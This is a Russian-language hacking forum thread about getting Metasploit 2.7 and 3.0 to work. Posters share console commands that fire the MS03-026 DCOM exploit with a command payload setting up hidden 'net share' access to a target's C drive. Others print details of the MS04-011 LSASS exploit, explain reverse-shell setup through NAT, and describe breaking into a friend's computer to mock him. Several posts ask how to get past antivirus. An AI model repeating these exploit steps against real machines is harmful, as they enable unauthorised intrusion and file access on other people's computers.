slider Нет, не перепутал=)) Гороздо хуже) Сейчас переустанавил прогу, все работает. Я первый раз в момент установки, когда открывается командная строка и происходит extracting файлов, видать не дождался полностью распаковки, вырубил ее.
да аналогичная байда была! поставил щас 3 версию в общем существенно отличается от той что в статье! вместо к примеру win32_reverse там reverse_tcp причём всё приходится прописывать с путём( windows/shell/reverse_tcp а вообще всё настраивается чисто интуитивно но всё равно СПС за статью!
я ламер ток почти ни чё не понял!и ваще вот пробую стучать всем в асю так называемым хацкерам ток не толку ни хто ни чё толком не может оюъяснить!"Спасибо одному челу который тратит на меня время=)
Чет не фига не получается расшарить диск С в своей локалке с версией 2.7 вот к примеру прописваю: msf > use msrpc_dcom_ms03_026 msf use msrpc_dcom_ms03_026 > set RHOST 162.11.15.277 ( там точно не фаера) RHOST -> 162.11.15.277 msf msrpc_dcom_ms03_026 > set PAYLOAD win32.exec PAYLOAD -> win32.exec msf msrpc_dcom_ms03_026<win32.exec> > set CMD 'net share "Share"'=C:\\' CMD -> net share "Share"=C:\ msf msrpc_dcom_ms03_026<win32.exec> > exploit после чего пишет [*] Invalid payload for speciality win32.exec (что-то подобное) Где-то пол года назал туже самую операцию проводил с версией 2.5 все было нормально пакеты летели.
попробуй для PAYLOAD другой модуль взять не win32.exec и ты уверен что именно net share "Share"'=C:\\ пашет в этой версии?
Я не понял, что ты переменой CMD присваиваешь... ИМХО должо быть так: set CMD "net share C$$=C:" будет супершара невидимая в сетевом окружении. А вообще почитай тут: http://forum.antichat.ru/thread20741.html и help посмотри по коммандам CMD
msf > info windows/exec Name: Windows Execute Command Version: 3534 Platform: Windows Arch: x86 Needs Admin: No Total size: 113 Provided by: vlad902 <[email protected]> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- CMD yes The command string to execute - командная строка для выполнения... EXITFUNC seh yes Exit technique: seh, thread, process правильно так: А значит в консоли MSF: set CMD net share имя_шары=c: (может в кавычки саму комманду CMD надо заключить, х.е.з), тогда так: set CMD "net share имя_шары=c:"
ещё вопрос где можно модулей накачать??? на милворме вроде но жму на сплойт та где М стоит он открывает страницу пустую ну всмысле со значком МИЛВОРМ (не реклама) кто знает как слить их?
тут фишку допер, когда мы объявляем set CMD shutdown -s -c "LOL" к примеру то кавычки метасплойт сам убирает и что мы видем: CMD => shutdown -s -c LOL и консоль не выполняет команду но это в 3 версии
Тут модули на перле для MSF 2.7 http://metasploit.com/projects/Framework/ Модули на руби, имхо только в составе пакета MSF 3.0
По многочисленным просьбам (тех кто голосовал за третий вариант): Видео к этой статье "Убиваем троя" (или убиваем Смерть Ламера ) качать (3,5 мб. в RAR) P.S. Надёюсь увидим скоро на VIDEO.ANTICHAT.RU (отправил на сайт)
Скажите пожалуйста. Все ли exploit-ы работают по принципу -"Сначало на жертву загружается файл, только потом доступ"??? Архи неудобно, т.к. невстретил я ещё пока "начинку" которая не просекалась бы антивирусами "жертвы" ... Быть может всётаки есть такие exploit-ы, которые используют такие "дыры" которые можно "поиметь" не "смазывая начинкой" (т.е. не заливая туда ту часть которая "палится" антивирусами). -Заранее благодарен за ответ.
пожалуйста. есть эксплоиты локальные, есть удаленные. в случае с удаленными ничего "загружать на жертву" не нужно..
Недопёр ты концепцию! Есть сплоит - код, использующий уязвимость для захвата управления (повышения привилегий и т. д). А есть начинка - полезная нагрузка - код которому будет переданно управление в результате работы сплоита. Палятся антивирем сами сплоиты (локальные). Удалённым сплоитам (атакующим сетевые сервисы) также может противодействовать антивирь (KIS 6.0 например) он же и файрвол и ids. Есть удалённый сплоит, изпользующий уязвимость в сервисе DCOM (LSASS), но эта дырка есть в WIN-XP-SP1 (непропатченной) - а таких систем в интернете всё меньше и меньше. Эту же дырку используют сетевые черви (типа MSBlast). Вот он в пакете (MSF ver. 3.0 beta 3) Code: msf > use windows/smb/ms04_011_lsass msf exploit(ms04_011_lsass) > info windows/smb/ms04_011_lsass Name: Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow Version: 4084 Platform: Windows Privileged: Yes License: Metasploit Framework License v1.0 Provided by: hdm <[email protected]> Available targets: Id Name -- ---- 0 Automatic Targetting 1 Windows 2000 English 2 Windows XP English Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no proxy chain RHOST yes The target address RPORT 445 yes Set the SMB service port SMBDOM WORKGROUP no The Windows domain to use for authentication SMBDirect True yes The target port is a raw SMB service (not NetBIOS) SMBNAME *SMBSERVER yes The NetBIOS hostname (required for port 139 connections) SMBPASS no The password for the specified username SMBUSER no The username to authenticate as SSL no Use SSL Payload information: Space: 1024 Avoid: 7 characters Description: This module exploits a stack overflow in the LSASS service, this vulnerability was originally found by eEye. When re-exploiting a Windows XP system, you will need need to run this module twice. DCERPC request fragmentation can be performed by setting 'FragSize' parameter. References: http://www.securityfocus.com/bid/10108 http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0533 http://www.osvdb.org/5248 http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx http://milw0rm.com/metasploit.php?id=36
А если у меня доступ в инет из локалки, и к компьютеру фактически не возможно обратиться из вне. (f.e. недоступен апач из инет установленый на машине ) Можно сделать HTTPHOST адрес другого хоста (например существующего хостинга ) и слушать с него? Соответственно и впаривать другой адрес.
Сам подумай... Как ты повесишь сервер метасплоита на чужом хосте? А вот предварительно сгенерированный (и настроенный под себя) сплоит можно повесить на своём сайте или на чужом (взломанном). 1. По сабжу (чтоб доступен был сервер MSF из инета): настраивай редирект на роутере (или NAT) с внешнего IP на локальный. 2. Используй переменную REALHOST - внешний IP (WAN) - но это имхо актуально, для удалённых слоитов, при атаке на сервисы и для начинок, использующих connectback (реверс) способ соединения.
Тут GreenBear наконец-то выложил моё видео по использованию пакета 2.7. В видео показываем как мы взламываем систему друга с помощью сплоита+реверсшелл, чтоб поглумиться над ним, обнаруживаем у него признаки наличия трояна Смерть Ламера, проникаемся к нему сочувствием и избавляем его от троя удалённо (сносим файл сервера троя антивирусом касперского, но этого мало, трой снова себя восстанавливает - он есть в процессах, находим подозрительно-левый процесс и пытаемся его удалённо убить - получается только с третьего раза с параметром "принудительно", затем находим автозагружаемый файл сервера трояна и тоже убиваем его антивирем).
C:\Program Files\Metasploit\Framework3\tools>"C:\Program Files\Metasploit\Framew ork3\msfupdate.cmd" [*] Updating the Metasploit Framework... Skipped '.' Для продолжения нажмите любую клавишу . . . Что значит "пропущена '.'"? Metasploit Framework user (09.05.2007. 10:33:27) При запуске msfweb.cmd выдает ошибку: C:\\>ruby "\\msfweb" -s "ruby" не является внутренней или внешней командой, исполняемой программой или пакетным файлом. C:\\>pause Для продолжения нажмите любую клавишу . . . надо установить ruby? можно поподробнее. заранее спасибо ЗЫ поставил бы по плюсику за каждую статью из всей серии